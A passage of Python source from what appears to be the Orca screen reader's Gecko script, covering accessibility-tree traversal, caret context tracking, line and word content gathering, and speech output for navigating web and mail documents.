elif role == pyatspi.ROLE_LIST_ITEM:
parent = previousObj.parent
if parent.getState().contains(pyatspi.STATE_FOCUSABLE) \
and not self.isAriaWidget(parent):
return parent
while previousObj.childCount:
role = previousObj.getRole()
state = previousObj.getState()
if role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU]:
break
elif role == pyatspi.ROLE_LIST \
and state.contains(pyatspi.STATE_FOCUSABLE) \
and not self.isAriaWidget(previousObj):
break
elif previousObj.childCount > 1000:
break
index = previousObj.childCount - 1
while index >= 0:
child = previousObj[index]
childOffset = self.utilities.characterOffsetInParent(child)
if isinstance(child, pyatspi.Accessibility.Accessible) \
and not (self.utilities.isSameObject(
previousObj, documentFrame) \
and childOffset > characterOffset):
previousObj = child
break
else:
index -= 1
if index < 0:
break
if self.utilities.isSameObject(previousObj, documentFrame):
previousObj = None
return previousObj
def findNextObject(self, obj, documentFrame):
"""Finds the object after to this one, where the tree we're
dealing with is a DOM and 'next' means the next object
in a linear presentation sense.
Arguments:
-obj: the object where to start.
"""
nextObj = None
characterOffset = 0
# If the object is the document frame, the next object is
# the one that follows us relative to our offset.
#
if self.utilities.isSameObject(obj, documentFrame):
[obj, characterOffset] = self.getCaretContext()
if not obj:
return None
# If the object has children, we'll choose the first one,
# unless it's a combo box or a focusable HTML list.
#
# [[[TODO: HACK - WDW Gecko's broken hierarchies make this
# a bit of a challenge.]]]
#
role = obj.getRole()
if role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU]:
descend = False
elif role == pyatspi.ROLE_LIST \
and obj.getState().contains(pyatspi.STATE_FOCUSABLE) \
and not self.isAriaWidget(obj):
descend = False
elif obj.childCount > 1000:
descend = False
else:
descend = True
index = 0
while descend and index < obj.childCount:
child = obj[index]
# bandaid for Gecko broken hierarchy
if child is None:
index += 1
continue
childOffset = self.utilities.characterOffsetInParent(child)
if isinstance(child, pyatspi.Accessibility.Accessible) \
and not (self.utilities.isSameObject(obj, documentFrame) \
and childOffset < characterOffset):
nextObj = child
break
else:
index += 1
# Otherwise, we'll look to the next sibling.
#
# [[[TODO: HACK - WDW Gecko's broken hierarchies make this
# a bit of a challenge.]]]
#
if not nextObj and obj.getIndexInParent() != -1:
index = obj.getIndexInParent() + 1
while index < obj.parent.childCount:
child = obj.parent[index]
if isinstance(child, pyatspi.Accessibility.Accessible):
nextObj = child
break
else:
index += 1
# If there is no next sibling, we'll move upwards.
#
candidate = obj
while not nextObj:
# Go up until we find a parent that might have a sibling to
# the right for us.
#
while candidate and candidate.parent \
and candidate.getIndexInParent() >= \
candidate.parent.childCount - 1 \
and not self.utilities.isSameObject(candidate, documentFrame):
candidate = candidate.parent
# Now...let's get the sibling.
#
# [[[TODO: HACK - WDW Gecko's broken hierarchies make this
# a bit of a challenge.]]]
#
if not self.utilities.isSameObject(candidate, documentFrame):
index = candidate.getIndexInParent() + 1
while index < candidate.parent.childCount:
child = candidate.parent[index]
if isinstance(child, pyatspi.Accessibility.Accessible):
nextObj = child
break
else:
index += 1
# We've exhausted trying to get all the children, but
# Gecko's broken hierarchy has failed us for all of
# them. So, we need to go higher.
#
candidate = candidate.parent
else:
break
return nextObj
####################################################################
# #
# Methods to get information about current object. #
# #
####################################################################
def clearCaretContext(self):
"""Deletes all knowledge of a character context for the current
document frame."""
documentFrame = self.utilities.documentFrame()
self._destroyLineCache()
try:
del self._documentFrameCaretContext[hash(documentFrame)]
except:
pass
def setCaretContext(self, obj=None, characterOffset=-1):
"""Sets the caret context for the current document frame."""
# We keep a context for each page tab shown.
# [[[TODO: WDW - probably should figure out how to destroy
# these contexts when a tab is killed.]]]
#
documentFrame = self.utilities.documentFrame()
if not documentFrame:
return
self._documentFrameCaretContext[hash(documentFrame)] = \
[obj, characterOffset]
self._updateLineCache(obj, characterOffset)
def getTextLineAtCaret(self, obj, offset=None):
"""Gets the portion of the line of text where the caret (or optional
offset) is. This is an override to accommodate the intricacies of our
caret navigation management and to deal with bogus line information
being returned by Gecko when using getTextAtOffset.
Argument:
- obj: an Accessible object that implements the AccessibleText
interface
- offset: an optional caret offset to use.
Returns the [string, caretOffset, startOffset] for the line of text
where the caret is.
"""
# We'll let the default script handle entries and other entry-like
# things (e.g. the text portion of a dojo spin button).
#
if not self.inDocumentContent(obj) \
or self.utilities.isEntry(obj) \
or self.utilities.isPasswordText(obj):
return default.Script.getTextLineAtCaret(self, obj, offset)
# Find the current line.
#
contextObj, contextOffset = self.getCaretContext()
contextOffset = max(0, contextOffset)
contents = self.currentLineContents
if self.findObjectOnLine(contextObj, contextOffset, contents) < 0:
contents = self.getLineContentsAtOffset(contextObj, contextOffset)
# Determine the caretOffset.
#
if self.utilities.isSameObject(obj, contextObj):
caretOffset = contextOffset
else:
try:
text = obj.queryText()
except:
caretOffset = 0
else:
caretOffset = text.caretOffset
# The reason we typically use this method is to present the contents
# of the current line, so our initial assumption is that the obj
# being passed in is also on this line. We'll try that first. We
# might have multiple instances of obj, in which case we'll have
# to consider the offset as well.
#
for content in contents:
candidate, startOffset, endOffset, string = content
if self.utilities.isSameObject(candidate, obj) \
and (offset is None or (startOffset <= offset <= endOffset)):
return string, caretOffset, startOffset
# If we're still here, obj presumably is not on this line. This
# shouldn't happen, but if it does we'll let the default script
# handle it for now.
#
#print "getTextLineAtCaret failed"
return default.Script.getTextLineAtCaret(self, obj, offset)
def searchForCaretLocation(self, acc):
"""Attempts to locate the caret on the page independent of our
caret context. This functionality is needed when a page loads
and the URL is for a fragment (anchor, id, named object) within
that page.
Arguments:
- acc: The top-level accessible in which we suspect to find the
caret (most likely the document frame).
Returns the [obj, caretOffset] containing the caret if it can
be determined. Otherwise [None, -1] is returned.
"""
context = [None, -1]
while acc:
try:
offset = acc.queryText().caretOffset
except:
acc = None
else:
context = [acc, offset]
childIndex = self.getChildIndex(acc, offset)
if childIndex >= 0 and acc.childCount:
acc = acc[childIndex]
else:
break
return context
def getCaretContext(self, includeNonText=True):
"""Returns the current [obj, caretOffset] if defined. If not,
it returns the first [obj, caretOffset] found by an in-order
traversal from the beginning of the document."""
# We keep a context for each page tab shown.
# [[[TODO: WDW - probably should figure out how to destroy
# these contexts when a tab is killed.]]]
#
documentFrame = self.utilities.documentFrame()
if not documentFrame:
return [None, -1]
try:
return self._documentFrameCaretContext[hash(documentFrame)]
except:
# If we don't have a context, we should attempt to see if we
# can find the caret first. Failing that, we'll start at the
# top.
#
[obj, caretOffset] = self.searchForCaretLocation(documentFrame)
self._documentFrameCaretContext[hash(documentFrame)] = \
self.findNextCaretInOrder(obj,
max(-1, caretOffset - 1),
includeNonText)
[obj, caretOffset] = \
self._documentFrameCaretContext[hash(documentFrame)]
return [obj, caretOffset]
def getCharacterAtOffset(self, obj, characterOffset):
"""Returns the character at the given characterOffset in the
given object or None if the object does not implement the
accessible text specialization.
"""
try:
unicodeText = self.utilities.unicodeText(obj)
return unicodeText[characterOffset]
except:
return None
def getWordContentsAtOffset(self, obj, characterOffset, boundary=None):
"""Returns an ordered list where each element is composed of an
[obj, startOffset, endOffset, string] tuple. The list is created
via an in-order traversal of the document contents starting at
the given object and characterOffset. The first element in
the list represents the beginning of the word. The last
element in the list represents the character just before the
beginning of the next word.
Arguments:
-obj: the object to start at
-characterOffset: the characterOffset in the object
-boundary: the pyatspi word boundary to use
"""
if not obj:
return []
boundary = boundary or pyatspi.TEXT_BOUNDARY_WORD_START
text = self.utilities.queryNonEmptyText(obj)
if text:
word = text.getTextAtOffset(characterOffset, boundary)
if word[1] < characterOffset <= word[2]:
characterOffset = word[1]
contents = self.utilities.getObjectsFromEOCs(obj, characterOffset, boundary)
if len(contents) > 1 \
and contents[0][0].getRole() == pyatspi.ROLE_LIST_ITEM:
contents = [contents[0]]
return contents
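# A minimal sketch (hypothetical text) of the boundary snap above:
# with text "foo bar" and characterOffset == 5 (inside "bar"),
# getTextAtOffset(5, TEXT_BOUNDARY_WORD_START) returns
# ("bar", 4, 7); since 4 < 5 <= 7, the offset is snapped back to
# 4, the start of the word, before the contents are gathered.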
def getLineContentsAtOffset(self, obj, offset):
"""Returns an ordered list where each element is composed of an
[obj, startOffset, endOffset, string] tuple. The list is created
via an in-order traversal of the document contents starting at
the given object and characterOffset. The first element in
the list represents the beginning of the line. The last
element in the list represents the character just before the
beginning of the next line.
Arguments:
-obj: the object to start at
-offset: the character offset in the object
"""
if not obj:
return []
# If it's an ARIA widget, we want the default generators to give
# us all the details.
#
if not self.isNavigableAria(obj):
if not self.isAriaWidget(obj):
obj = obj.parent
objects = [[obj, 0, 1, ""]]
ext = obj.queryComponent().getExtents(0)
extents = [ext.x, ext.y, ext.width, ext.height]
for i in range(obj.getIndexInParent() + 1, obj.parent.childCount):
newObj = obj.parent[i]
ext = newObj.queryComponent().getExtents(0)
newExtents = [ext.x, ext.y, ext.width, ext.height]
if self.onSameLine(extents, newExtents):
objects.append([newObj, 0, 1, ""])
else:
break
for i in range(obj.getIndexInParent() - 1, -1, -1):
newObj = obj.parent[i]
ext = newObj.queryComponent().getExtents(0)
newExtents = [ext.x, ext.y, ext.width, ext.height]
if self.onSameLine(extents, newExtents):
objects[0:0] = [[newObj, 0, 1, ""]]
else:
break
return objects
boundary = pyatspi.TEXT_BOUNDARY_LINE_START
# Find the beginning of this line w.r.t. this object.
#
text = self.utilities.queryNonEmptyText(obj)
if not text:
offset = 0
else:
if offset == -1:
offset = 0
[line, start, end] = text.getTextAtOffset(offset, boundary)
# If we're still seeing bogusity, which we only seem to see when
# moving up, locate the previous character and use it instead.
#
if not (start <= offset < end):
pObj, pOffset = self.findPreviousCaretInOrder(obj, end)
if pObj:
obj, offset = pObj, pOffset
text = self.utilities.queryNonEmptyText(obj)
if text:
[line, start, end] = \
text.getTextAtOffset(offset, boundary)
if start <= offset < end:
# So far so good. If the line doesn't begin with an EOC, we
# have our first character for this object.
#
try:
isEOC = line.startswith(self.EMBEDDED_OBJECT_CHARACTER)
except:
isEOC = False
if not isEOC:
offset = start
else:
# The line may begin with a link, or it may begin with
# an anchor which makes this text something one can jump
# to via a link. Anchors are bad.
#
childIndex = self.getChildIndex(obj, start)
if childIndex >= 0:
child = obj[childIndex]
childText = self.utilities.queryNonEmptyText(child)
if not childText:
# It's probably an anchor. It might be something
# else, but that's okay because we do another
# check later to make sure we have everything on
# the left. Set the offset to just after the
# assumed anchor.
#
offset = start + 1
elif obj.getRole() == pyatspi.ROLE_PARAGRAPH \
and child.getRole() == pyatspi.ROLE_PARAGRAPH:
# We don't normally see nested paragraphs. But
# they occur at least when a paragraph begins
# with a multi-line-high character. If we set
# the beginning of this line to that initial
# character, we'll get stuck. See bug 592383.
#
if end - start > 1 and end - offset == 1:
# We must be Up Arrowing. Set the offset to
# just past the EOC so that we present the
# line rather than saying "blank."
#
offset = start + 1
else:
# It's a link that ends on our left. Who knows
# where it starts? Might be on the previous
# line. We will assume that it begins on this
# line if the start offset is 0. However, it
# might be an image link which occupies more
# than just this line. To be safe, we'll also
# look to be sure that the text does not start
# with an embedded object character. See bug
# 587794.
#
cOffset = childText.characterCount - 1
[cLine, cStart, cEnd] = \
childText.getTextAtOffset(cOffset, boundary)
if cStart == 0 \
and not cLine.startswith(\
self.EMBEDDED_OBJECT_CHARACTER) \
and obj.getRole() != pyatspi.ROLE_PANEL:
# It starts on this line.
#
obj = child
offset = cStart
else:
offset = start + 1
extents = self.getExtents(obj, offset, offset + 1)
# Get the objects on this line.
#
objects = self.utilities.getObjectsFromEOCs(obj, offset, boundary)
# Check for things on the left.
#
lastExtents = (0, 0, 0, 0)
done = False
while not done:
[firstObj, start, end, string] = objects[0]
[prevObj, pOffset] = self.findPreviousCaretInOrder(firstObj, start)
if not prevObj or self.utilities.isSameObject(prevObj, firstObj):
break
text = self.utilities.queryNonEmptyText(prevObj)
if text:
line = text.getTextAtOffset(pOffset, boundary)
pOffset = line[1]
# If a line begins with a link, getTextAtOffset might
# return a zero-length string. If we have a valid offset,
# increment pOffset by 1 before getting the extents.
#
if line[1] > 0 and line[1] == line[2]:
pOffset += 1
prevExtents = self.getExtents(prevObj, pOffset, pOffset + 1)
if self.onSameLine(extents, prevExtents) \
and extents != prevExtents \
and lastExtents != prevExtents:
toAdd = self.utilities.getObjectsFromEOCs(prevObj, pOffset, boundary)
toAdd = [x for x in toAdd if x not in objects]
if not toAdd:
break
# Depending on the line, there's a chance that we got our
# current object as part of toAdd. Check for dupes and just
# add up to the current object if we find them.
#
try:
index = toAdd.index(objects[0])
except:
index = len(toAdd)
objects[0:0] = toAdd[0:index]
else:
break
lastExtents = prevExtents
# Check for things on the right.
#
lastExtents = (0, 0, 0, 0)
done = False
while not done:
[lastObj, start, end, string] = objects[-1]
[nextObj, nOffset] = self.findNextCaretInOrder(lastObj, end)
if self.utilities.isSameObject(lastObj, nextObj):
[nextObj, nOffset] = \
self.findNextCaretInOrder(nextObj, nOffset)
if not nextObj or self.utilities.isSameObject(nextObj, lastObj):
break
text = self.utilities.queryNonEmptyText(nextObj)
if text:
line = text.getTextAtOffset(nOffset + 1, boundary)
nOffset = line[1]
nextExtents = self.getExtents(nextObj, nOffset, nOffset + 1)
if self.onSameLine(extents, nextExtents) \
and extents != nextExtents \
and lastExtents != nextExtents \
or nextExtents == (0, 0, 0, 0):
toAdd = self.utilities.getObjectsFromEOCs(nextObj, nOffset, boundary)
toAdd = [x for x in toAdd if x not in objects]
objects.extend(toAdd)
done = not toAdd
elif (nextObj.getRole() in [pyatspi.ROLE_SECTION,
pyatspi.ROLE_TABLE_CELL] \
and self.isUselessObject(nextObj)):
toAdd = self.utilities.getObjectsFromEOCs(nextObj, nOffset, boundary)
toAdd = [x for x in toAdd if x not in objects]
done = True
for item in toAdd:
itemExtents = self.getExtents(item[0], item[1], item[2])
if self.onSameLine(extents, itemExtents):
objects.append(item)
done = False
else:
done = True
if done:
break
else:
break
lastExtents = nextExtents
return objects
def getObjectContentsAtOffset(self, obj, characterOffset):
"""Returns an ordered list where each element is composed of
an [obj, startOffset, endOffset, string] tuple. The list is
created via an in-order traversal of the document contents
starting and stopping at the given object.
"""
return self.utilities.getObjectsFromEOCs(obj, characterOffset)
####################################################################
# #
# Methods to speak current objects. #
# #
####################################################################
# [[[TODO: WDW - this needs to be moved to the speech generator.]]]
#
def getACSS(self, obj, string):
"""Returns the ACSS to speak anything for the given obj."""
if obj.getRole() == pyatspi.ROLE_LINK:
acss = self.voices[settings.HYPERLINK_VOICE]
elif string and isinstance(string, str) \
and string.isupper() \
and string.strip().isalpha():
acss = self.voices[settings.UPPERCASE_VOICE]
else:
acss = self.voices[settings.DEFAULT_VOICE]
return acss
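# A minimal sketch of the voice selection above:
#   getACSS(linkObj, "home")  -> voices[settings.HYPERLINK_VOICE]
#   getACSS(textObj, "NASA")  -> voices[settings.UPPERCASE_VOICE]
#     ("NASA".isupper() and "NASA".strip().isalpha() are both True)
#   getACSS(textObj, "Hello") -> voices[settings.DEFAULT_VOICE]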
def getUtterancesFromContents(self, contents, speakRole=True):
"""Returns a list of [text, acss] tuples based upon the list
of [obj, startOffset, endOffset, string] tuples passed in.
Arguments:
-contents: a list of [obj, startOffset, endOffset, string] tuples
-speakRole: if True, speak the roles of objects
"""
if not len(contents):
return []
# Even if we want to speakRole, we don't want to do that for the
# document frame. And we're going to special-case headings so
# that we don't overspeak heading role info, which we're in danger
# of doing if a heading includes links or images.
#
doNotSpeakRoles = [pyatspi.ROLE_DOCUMENT_FRAME,
pyatspi.ROLE_HEADING,
pyatspi.ROLE_LIST_ITEM,
pyatspi.ROLE_TEXT,
pyatspi.ROLE_ALERT]
utterances = []
prevObj = None
for content in contents:
[obj, startOffset, endOffset, string] = content
string = self.utilities.adjustForRepeats(string)
role = obj.getRole()
# If we don't have an object, there's nothing to do. If we have
# a string, but it consists solely of spaces, we have nothing to
# say. If it's a label for an object in our contents, we'll get
# that label via the speech generator for the object.
#
if not obj \
or len(string) and not len(string.strip(" ")) \
or self.isLabellingContents(obj, contents):
continue
# TODO - JD: this is a temporary and sad hack borrowed from
# clumpUtterances() which is no longer called by speakContents().
# Ultimately this sort of crap belongs in a generator (along with
# other similar crap).
if string == "\n" and len(contents) == 1 \
and _settingsManager.getSetting('speakBlankLines'):
string = messages.BLANK
# Thunderbird now does something goofy with smileys in
# email: exposes them as a nested paragraph with a name
# consisting of the punctuation used to create the smiley
# and an empty accessible text object. This causes us to
# speak tutorial info for each smiley. :-( type in text.
#
elif role == pyatspi.ROLE_PARAGRAPH and not len(string):
string = obj.name
# We also see goofiness in some pages. That can cause
# SayAll by Sentence to spit up. See bug 591351. So
# if we still do not have a string and we've got more
# than one object in contents, let's dump this one.
#
if len(contents) > 1 and not len(string):
continue
# If it is a "useless" image (i.e. not a link, no associated
# text), ignore it, unless it's the only thing here.
#
elif role == pyatspi.ROLE_IMAGE and self.isUselessObject(obj) \
and len(contents) > 1:
continue
# If the focused item is a checkbox or a radio button for which
# we had to infer the label, odds are that the inferred label is
# immediately to the right. Under these circumstances, we'll
# double speak the "label". It would be nice to avoid that.
# [[[TODO - JD: This is the simple version. It does not handle
# the possibility of the fake label being composed of multiple
# objects.]]]
#
if prevObj \
and prevObj.getRole() in [pyatspi.ROLE_CHECK_BOX,
pyatspi.ROLE_RADIO_BUTTON] \
and prevObj.getState().contains(pyatspi.STATE_FOCUSED):
if self.labelInference.infer(prevObj) == string.strip():
continue
# If we don't have a string, then use the speech generator.
# Otherwise, we'll want to speak the string and possibly the
# role.
#
if not len(string) \
or self.utilities.isEntry(obj) \
or self.utilities.isPasswordText(obj):
rv = self.speechGenerator.generateSpeech(obj)
# Crazy crap to make clump and friends happy until we can
# kill them. (They don't deal well with what the speech
# generator provides.)
for item in rv:
if isinstance(item, str):
utterances.append([item, self.getACSS(obj, item)])
else:
utterances.append([string, self.getACSS(obj, string)])
if speakRole and not role in doNotSpeakRoles:
utterance = self.speechGenerator.getRoleName(obj)
if utterance:
utterances.append(utterance)
# If the object is a heading, or is contained within a heading,
# speak that role information at the end of the object.
#
isLastObject = (contents.index(content) == (len(contents) - 1))
isHeading = (role == pyatspi.ROLE_HEADING)
if speakRole and (isLastObject or isHeading):
if isHeading:
heading = obj
else:
heading = self.utilities.ancestorWithRole(
obj,
[pyatspi.ROLE_HEADING],
[pyatspi.ROLE_DOCUMENT_FRAME])
if heading:
utterance = self.speechGenerator.getRoleName(heading)
if utterance:
utterances.append(utterance)
prevObj = obj
return utterances
def clumpUtterances(self, utterances):
"""Returns a list of utterances clumped together by acss.
Arguments:
-utterances: unclumped utterances
"""
clumped = []
for [element, acss] in utterances:
if len(clumped) == 0:
clumped = [[element, acss]]
elif acss == clumped[-1][1] \
and isinstance(element, str) \
and isinstance(clumped[-1][0], str):
clumped[-1][0] = clumped[-1][0].rstrip(" ")
clumped[-1][0] += " " + element
else:
clumped.append([element, acss])
if (len(clumped) == 1) and (clumped[0][0] == "\n"):
if _settingsManager.getSetting('speakBlankLines'):
return [[messages.BLANK, self.voices[settings.SYSTEM_VOICE]]]
if len(clumped) and isinstance(clumped[-1][0], str):
clumped[-1][0] = clumped[-1][0].rstrip(" ")
return clumped
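# Worked example (hypothetical utterances): assuming acss1 != acss2,
#   [["Hello ", acss1], ["world", acss1], ["link", acss2]]
# clumps to
#   [["Hello world", acss1], ["link", acss2]]
# because adjacent strings sharing an acss are joined with a single
# space after trailing blanks are stripped.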
def speakContents(self, contents, speakRole=True):
"""Speaks each string in contents using the associated voice/acss"""
utterances = self.getUtterancesFromContents(contents, speakRole)
for utterance in utterances:
speech.speak(utterance, interrupt=False)
def speakCharacterAtOffset(self, obj, characterOffset):
"""Speaks the character at the given characterOffset in the
given object."""
character = self.getCharacterAtOffset(obj, characterOffset)
self.speakMisspelledIndicator(obj, characterOffset)
if obj:
if character and character != self.EMBEDDED_OBJECT_CHARACTER:
speech.speakCharacter(character,
self.getACSS(obj, character))
elif not self.utilities.isEntry(obj):
# We won't have a character if we move to the end of an
# entry (in which case we're not on a character and therefore
# have nothing to say), or when we hit a component with no
# text (e.g. checkboxes) or reset the caret to the parent's
# characterOffset (lists). In these latter cases, we'll just
# speak the entire component.
#
utterances = self.speechGenerator.generateSpeech(obj)
speech.speak(utterances)
####################################################################
# #
# Methods to navigate to previous and next objects. #
# #
####################################################################
def setCaretPosition(self, obj, characterOffset):
"""Sets the caret position to the given character offset in the
given object.
"""
if self.flatReviewContext:
self.toggleFlatReviewMode()
self.setCaretContext(obj, characterOffset)
try:
state = obj.getState()
except:
return
orca.setLocusOfFocus(None, obj, notifyScript=False)
if state.contains(pyatspi.STATE_FOCUSABLE):
obj.queryComponent().grabFocus()
text = self.utilities.queryNonEmptyText(obj)
if text:
text.setCaretOffset(characterOffset)
def moveToMouseOver(self, inputEvent):
"""Positions the caret offset to the next character or object
in the mouse over which has just appeared.
"""
if not self.lastMouseOverObject:
self.presentMessage(messages.MOUSE_OVER_NOT_FOUND)
return
if not self.inMouseOverObject:
obj = self.lastMouseOverObject
offset = 0
if obj and not obj.getState().contains(pyatspi.STATE_FOCUSABLE):
[obj, offset] = self.findFirstCaretContext(obj, offset)
if obj and obj.getState().contains(pyatspi.STATE_FOCUSABLE):
obj.queryComponent().grabFocus()
elif obj:
contents = self.getObjectContentsAtOffset(obj, offset)
# If we don't have anything to say, let's try one more
# time.
#
if len(contents) == 1 and not contents[0][3].strip():
[obj, offset] = self.findNextCaretInOrder(obj, offset)
contents = self.getObjectContentsAtOffset(obj, offset)
self.setCaretPosition(obj, offset)
self.speakContents(contents)
self.updateBraille(obj)
self.inMouseOverObject = True
else:
# Route the mouse pointer where it was before both to "clean up
# after ourselves" and also to get the mouse over object to go
# away.
#
x, y = self.oldMouseCoordinates
eventsynthesizer.routeToPoint(x, y)
self.restorePreMouseOverContext()
def restorePreMouseOverContext(self):
"""Cleans things up after a mouse-over object has been hidden."""
obj, offset = self.preMouseOverContext
if obj and not obj.getState().contains(pyatspi.STATE_FOCUSABLE):
[obj, offset] = self.findFirstCaretContext(obj, offset)
if obj and obj.getState().contains(pyatspi.STATE_FOCUSABLE):
obj.queryComponent().grabFocus()
elif obj:
self.setCaretPosition(obj, offset)
self.speakContents(self.getObjectContentsAtOffset(obj, offset))
self.updateBraille(obj)
self.inMouseOverObject = False
self.lastMouseOverObject = None
def goNextCharacter(self, inputEvent):
"""Positions the caret offset to the next character or object
in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
while obj:
[obj, characterOffset] = self.findNextCaretInOrder(obj,
characterOffset)
if obj and obj.getState().contains(pyatspi.STATE_VISIBLE):
break
if not obj:
[obj, characterOffset] = self.getBottomOfFile()
else:
self.speakCharacterAtOffset(obj, characterOffset)
self.setCaretPosition(obj, characterOffset)
self.updateBraille(obj)
def goPreviousCharacter(self, inputEvent):
"""Positions the caret offset to the previous character or object
in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
while obj:
[obj, characterOffset] = self.findPreviousCaretInOrder(
obj, characterOffset)
if obj and obj.getState().contains(pyatspi.STATE_VISIBLE):
break
if not obj:
[obj, characterOffset] = self.getTopOfFile()
else:
self.speakCharacterAtOffset(obj, characterOffset)
self.setCaretPosition(obj, characterOffset)
self.updateBraille(obj)
def goPreviousWord(self, inputEvent):
"""Positions the caret offset to beginning of the previous
word or object in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
# Make sure we have a word.
#
[obj, characterOffset] = \
self.findPreviousCaretInOrder(obj, characterOffset)
# To be consistent with Gecko's native navigation, we want to move
# to the next (or technically the previous) word start boundary.
#
boundary = pyatspi.TEXT_BOUNDARY_WORD_START
contents = self.getWordContentsAtOffset(obj, characterOffset, boundary)
if not len(contents):
return
[obj, startOffset, endOffset, string] = contents[0]
if len(contents) == 1 \
and endOffset - startOffset == 1 \
and self.getCharacterAtOffset(obj, startOffset) == " ":
# Our "word" is just a space. This can happen if the previous
# word was a mark of punctuation surrounded by whitespace (e.g.
# " | ").
#
[obj, characterOffset] = \
self.findPreviousCaretInOrder(obj, startOffset)
contents = \
self.getWordContentsAtOffset(obj, characterOffset, boundary)
if len(contents):
[obj, startOffset, endOffset, string] = contents[0]
self.setCaretPosition(obj, startOffset)
self.updateBraille(obj)
self.speakMisspelledIndicator(obj, startOffset)
self.speakContents(contents)
def goNextWord(self, inputEvent):
"""Positions the caret offset to the end of next word or object
in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
# Make sure we have a word.
#
characterOffset = max(0, characterOffset)
[obj, characterOffset] = \
self.findNextCaretInOrder(obj, characterOffset)
# To be consistent with Gecko's native navigation, we want to
# move to the next word end boundary.
#
boundary = pyatspi.TEXT_BOUNDARY_WORD_START
contents = self.getWordContentsAtOffset(obj, characterOffset, boundary)
if not (len(contents) and contents[-1][2]):
return
[obj, startOffset, endOffset, string] = contents[-1]
if string and string[-1].isspace():
endOffset -= 1
self.setCaretPosition(obj, endOffset)
self.updateBraille(obj)
self.speakMisspelledIndicator(obj, startOffset)
self.speakContents(contents)
def findPreviousLine(self, obj, characterOffset, updateCache=True):
"""Locates the caret offset at the previous line in the document
window.
Arguments:
-obj: the object from which the search should begin
-characterOffset: the offset within obj from which the search should
begin
-updateCache: whether or not we should update the line cache
Returns the [obj, characterOffset] at the beginning of the line.
"""
if not obj:
[obj, characterOffset] = self.getCaretContext()
if not obj:
return self.getTopOfFile()
currentLine = self.currentLineContents
index = self.findObjectOnLine(obj, characterOffset, currentLine)
if index < 0:
text = self.utilities.queryNonEmptyText(obj)
if text and text.characterCount == characterOffset:
characterOffset -= 1
currentLine = self.getLineContentsAtOffset(obj, characterOffset)
prevObj = currentLine[0][0]
prevOffset = currentLine[0][1]
[prevObj, prevOffset] = \
self.findPreviousCaretInOrder(currentLine[0][0], currentLine[0][1])
extents = self.getExtents(currentLine[0][0],
currentLine[0][1],
currentLine[0][2])
prevExtents = self.getExtents(prevObj, prevOffset, prevOffset + 1)
while self.onSameLine(extents, prevExtents) \
and (extents != prevExtents):
[prevObj, prevOffset] = \
self.findPreviousCaretInOrder(prevObj, prevOffset)
prevExtents = self.getExtents(prevObj, prevOffset, prevOffset + 1)
# If the user did some back-to-back arrowing, we might already have
# the line contents.
#
prevLine = self._previousLineContents
index = self.findObjectOnLine(prevObj, prevOffset, prevLine)
if index < 0:
prevLine = self.getLineContentsAtOffset(prevObj, prevOffset)
if not prevLine:
return [None, -1]
prevObj = prevLine[0][0]
prevOffset = prevLine[0][1]
failureCount = 0
while failureCount < 5 and prevObj and currentLine == prevLine:
# For some reason we're stuck. We'll try a few times by
# caret before trying by object.
#
# print "find prev line failed", prevObj, prevOffset
[prevObj, prevOffset] = \
self.findPreviousCaretInOrder(prevObj, prevOffset)
prevLine = self.getLineContentsAtOffset(prevObj, prevOffset)
failureCount += 1
if currentLine == prevLine:
# print "find prev line still stuck", prevObj, prevOffset
documentFrame = self.utilities.documentFrame()
prevObj = self.findPreviousObject(prevObj, documentFrame)
prevOffset = 0
[prevObj, prevOffset] = self.findNextCaretInOrder(prevObj,
prevOffset - 1)
if not script_settings.arrowToLineBeginning:
extents = self.getExtents(obj,
characterOffset,
characterOffset + 1)
oldX = extents[0]
for item in prevLine:
extents = self.getExtents(item[0], item[1], item[1] + 1)
newX1 = extents[0]
newX2 = newX1 + extents[2]
if newX1 < oldX <= newX2:
newObj = item[0]
newOffset = 0
text = self.utilities.queryNonEmptyText(prevObj)
if text:
newY = extents[1] + extents[3] / 2
newOffset = text.getOffsetAtPoint(oldX, newY, 0)
if 0 <= newOffset <= characterOffset:
prevOffset = newOffset
prevObj = newObj
break
if updateCache:
self._nextLineContents = self.currentLineContents
self.currentLineContents = prevLine
return [prevObj, prevOffset]
def findNextLine(self, obj, characterOffset, updateCache=True):
"""Locates the caret offset at the next line in the document
window.
Arguments:
-obj: the object from which the search should begin
-characterOffset: the offset within obj from which the search should
begin
-updateCache: whether or not we should update the line cache
Returns the [obj, characterOffset] at the beginning of the line.
"""
if not obj:
[obj, characterOffset] = self.getCaretContext()
if not obj:
return self.getBottomOfFile()
currentLine = self.currentLineContents
index = self.findObjectOnLine(obj, characterOffset, currentLine)
if index < 0:
currentLine = self.getLineContentsAtOffset(obj, characterOffset)
[nextObj, nextOffset] = \
self.findNextCaretInOrder(currentLine[-1][0],
currentLine[-1][2] - 1)
extents = self.getExtents(currentLine[-1][0],
currentLine[-1][1],
currentLine[-1][2])
nextExtents = self.getExtents(nextObj, nextOffset, nextOffset + 1)
while self.onSameLine(extents, nextExtents) \
and (extents != nextExtents):
[nextObj, nextOffset] = \
self.findNextCaretInOrder(nextObj, nextOffset)
nextExtents = self.getExtents(nextObj, nextOffset, nextOffset + 1)
# If the user did some back-to-back arrowing, we might already have
# the line contents.
#
nextLine = self._nextLineContents
index = self.findObjectOnLine(nextObj, nextOffset, nextLine)
if index < 0:
nextLine = self.getLineContentsAtOffset(nextObj, nextOffset)
if not nextLine:
return [None, -1]
failureCount = 0
while failureCount < 5 and nextObj and currentLine == nextLine:
# For some reason we're stuck. We'll try a few times by
# caret before trying by object.
#
#print "find next line failed", nextObj, nextOffset
[nextObj, nextOffset] = \
self.findNextCaretInOrder(nextObj, nextOffset)
if nextObj:
nextLine = self.getLineContentsAtOffset(nextObj, nextOffset)
failureCount += 1
if currentLine == nextLine:
#print "find next line still stuck", nextObj, nextOffset
documentFrame = self.utilities.documentFrame()
nextObj = self.findNextObject(nextObj, documentFrame)
nextOffset = 0
# On a page which contains tables which are not only nested, but
# are surrounded by line break characters and/or embedded within
# a paragraph or span, there's an excellent chance that we'll skip
# right over the nested content. See bug #555055. If we can detect
# this condition, we should set the nextOffset to the EOC which
# represents the nested content before findNextCaretInOrder does
# its thing.
#
if nextOffset == 0 \
and self.getCharacterAtOffset(nextObj, nextOffset) == "\n" \
